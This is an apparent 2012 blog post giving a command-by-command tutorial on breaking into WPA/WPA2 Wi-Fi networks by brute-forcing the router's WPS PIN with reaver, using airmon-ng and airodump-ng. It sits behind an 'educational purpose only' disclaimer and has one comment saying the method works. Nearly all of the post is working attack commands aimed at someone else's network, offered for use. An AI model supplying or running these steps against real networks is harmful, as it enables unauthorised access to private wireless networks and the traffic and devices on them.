This is for educational purpose only and im not responsible if any illegal activity
English French German Spain Italian Dutch Russian Portuguese Japanese Korean Arabic Chinese Simplified

Friday 20 January 2012

hack wpa/wpa2 without dictinory using reaver


*in this tutorial reaver-1.3*


download reaver-1.3(latest) click here


1. after download you need to extract file
code : tar zxf reaver-1.3.tar.gz


2.and install :
code :
cd reaver-1.3/src (if root folder)
./comfigure
make
make install


3.crack


airmon-ng start wlan0 (ur interface)


airodump-ng mon0 (ur monitor)


reaver -i mon0 -b (bssid target) -vv(double v)
once you got the pin you can save it (incase target change password) and use this code :


reaver -i mon0 -b (bssid) -p (pin here) -vv


if you have any question you can ask me or here

1 comments:

  • Anonymous says:
    7 February 2012 at 08:15

    its work ty...

Post a Comment

Blogger news